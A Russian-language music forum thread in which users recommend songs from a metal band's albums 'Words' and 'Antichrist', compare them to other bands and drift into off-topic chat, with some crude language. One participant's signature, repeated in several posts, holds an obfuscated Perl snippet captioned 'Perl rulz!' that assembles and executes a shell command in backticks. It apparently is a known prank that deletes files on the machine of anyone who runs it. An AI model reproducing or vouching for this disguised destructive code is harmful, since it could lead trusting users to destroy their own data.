"Words..." (2005) - могу сказать что многие считают его лучшим альбомом, НО, если решите качать, начните все-таки с антихриста
"Antichrist" (2007) - для начала скачайте "Axiom", многим он напоминает соадовский квешчн, потом "My Apterous Angel" (привет, соул), такого пиздеца я еще никогда не слышал вообще, меня конкретно глючит от нее, потом "The Dark Inside" и наконец "Epode" - полностью аккустическую песенку)))) "Distant Fires..." может напомнить серарт, эдакий инструментальный амбиент, и потом добейте себя кавером на "Leprosy"
короче ебитесь дальше как хотите) я все сказал))) _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
$!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;
$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++
;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`
Perl rulz!
На данный момент слышала только несколько их песен, но кое-что могу сказать.
В принципе death-ом я не особо увлекаюсь, но эта группа мне понравилась, техничные ребята, чередуют гроул с вокалом - что хорошо ибо когда в песнях сплошной гроул это не есть круто, имхо...надоело уже... Что мне еще нравится в музыке - опять же сочетание мелодики и жесткости, быстрые ритмы близки к трешу и хардкору, что тоже не может не радовать... Короче нравитсо и нии...вот))
Кстати Axiom лично мне напоминает квешчн только в начале. _________________ ...Знай, я все равно тебя сломаю,
Настоящей жизни научу,
Так смешно и просто разгадаю,
Вмиг узнаю - вмиг разоблачу.
Кстати Axiom лично мне напоминает квешчн только в начале.
клип похож чемто (= тоже хотя в начале))) я тока первые 30 секунд клипа видел) _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!
неа, у него ребенок плакал на руках, а я детей боюсь _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!
Lobzik
а потом своих завел? _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!
а че их бояться то......... _________________ ...Знай, я все равно тебя сломаю,
Настоящей жизни научу,
Nancy
ну ктото змей боится, я этого например тоже не очень хорошо понимаю что их бояться то.........))) _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!
я не мужик, не мне об этом судить _________________ ...Знай, я все равно тебя сломаю,
Настоящей жизни научу,